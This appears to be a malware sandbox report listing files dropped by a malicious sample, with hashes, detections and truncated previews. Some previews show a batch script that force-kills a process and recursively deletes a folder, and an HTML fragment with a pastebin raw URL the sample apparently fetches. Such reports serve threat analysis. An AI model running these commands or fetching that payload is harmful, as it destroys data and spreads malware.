                                                                                                                                                                                                                                        Preview:L..................F.@.. ......,...."RZn.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3274
                                                                                                                                                                                                                                        Entropy (8bit):5.3318368586986695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                                                                                                                                                                                        MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                                                                                                                        SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                                                                                                                        SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                                                                                                                        SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\inject.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2232
                                                                                                                                                                                                                                        Entropy (8bit):5.379736180876081
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:tLHyIFKL3IZ2KRH9Ougos
                                                                                                                                                                                                                                        MD5:9D384A9EBEABB083763926A2E63505A6
                                                                                                                                                                                                                                        SHA1:3AB2DD8F7518A36D7E22EFD76FF25F3DFA25D889
                                                                                                                                                                                                                                        SHA-256:801BC488523F40135A2F58EE86844AD3AFD2EFD0AF5DD0F7DE40978E7EDE92DD
                                                                                                                                                                                                                                        SHA-512:03941519E7F748E7A151CDEFC2E6D98A19B2E077AB09C48822B3882D8BA39C8427A9766C26B3F28DB419385FD7F030C3A7D5FE5ADE4F796AE876921042F5FED9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2662
                                                                                                                                                                                                                                        Entropy (8bit):7.8230547059446645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                                                                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                                                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                                                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                                                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2662
                                                                                                                                                                                                                                        Entropy (8bit):7.8230547059446645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                                                                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                                                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                                                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                                                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3125704
                                                                                                                                                                                                                                        Entropy (8bit):7.990259949871784
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:MN5JrWK2CToOR1ewbLQZ5reodSTgYSFLDJzIAMAAAedMnMbw0gvbP/+3jxYQzbPI:MN5JrW2oo1ewbLQzegSTgNFLDRR4KMbw
                                                                                                                                                                                                                                        MD5:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                                                                        SHA1:9BC12D5DB437C0673437E9FEAADD0027887D1C13
                                                                                                                                                                                                                                        SHA-256:35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
                                                                                                                                                                                                                                        SHA-512:EA6511B4E318EB31E4DD8862CD7967906BD1705F2B1D6422B28424F0C810F9647702315B9BDCEA1FD32421E5D72B61027E9991DA6B779D6DE02B61E410EEB747
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................X.0..............................................0...N...........u/..<..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....N...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):729
                                                                                                                                                                                                                                        Entropy (8bit):5.11212271596743
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:8G/y8vM/jwKdt//j/K3AEN6Qclfw/1127UwLnjDTwDMVFAi:8G/y8wj5djUNso/XUnLnjD0DMnAi
                                                                                                                                                                                                                                        MD5:ADE6854A8351E50758F93066F547C188
                                                                                                                                                                                                                                        SHA1:771278CB4FC00BDC54B95C2FE43C839F9D59FD6C
                                                                                                                                                                                                                                        SHA-256:FAA5DA36E19D42EA123A6765D50E6B27794DB08342850D1E36695332F8E47BC0
                                                                                                                                                                                                                                        SHA-512:3202F608789CAD4E8485B06344EACFE9AD48B197A4FAD94C9F15CAC07C7322BDB838F61F82955DA7C136952D61922E47E8CA4FB77CCBC7B47953D9943069C724
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview: [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->..<head>..<title>Suspected phishing site | Cloudflare</title>..<meta charset="UTF-8" />..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />..<meta http-equiv="X-UA-Compatible" content="IE=Edge" />..<meta name="robots" content="noindex, nofollow" />..<meta name="viewport" content="width=device-width,initial-scale=1" />..<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />.. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->..cp..https://pastebin.com/raw/dq3hWX27..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\conhost.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1679360
                                                                                                                                                                                                                                        Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                                        MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                        SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                        SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                        SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                        • Filename: gHPYUEh253.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: 7aHn0kxDWZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: BlazeHack.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: CKHSihDX4S.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: XXZahG4d9Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: vD4M7DL9MY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: n6o0pd9pZC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: lfjG1UlwP1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\conhost.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):468992
                                                                                                                                                                                                                                        Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                                        MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                        SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                        SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                        • Filename: gHPYUEh253.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: 7aHn0kxDWZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: BlazeHack.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: CKHSihDX4S.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: XXZahG4d9Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: vD4M7DL9MY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: n6o0pd9pZC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: lfjG1UlwP1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\conhost.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):222
                                                                                                                                                                                                                                        Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                                        MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                        SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                        SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                        SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2343406
                                                                                                                                                                                                                                        Entropy (8bit):5.89551469554261
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xR:R9kqGu7okoZscCnf0/Zs9k
                                                                                                                                                                                                                                        MD5:AEFFE98F08187C1796B0C19E28AFF08F
                                                                                                                                                                                                                                        SHA1:418740DFB8FA1EA685F78D7641586FCA0417BF8F
                                                                                                                                                                                                                                        SHA-256:6659A9416A334434BDE5035F119D84E7FFDC74C0B1364650E0A323AFB191FD87
                                                                                                                                                                                                                                        SHA-512:29F085F81CEF17F233103AC553199EED25C81E89CB8EB9DF4F24B32C68763DCF7498B50ABA10252496B2F19587B57885365019AE694BBE5BD6EACAD8E25AF370
                                                                                                                                                                                                                                        Malicious:false
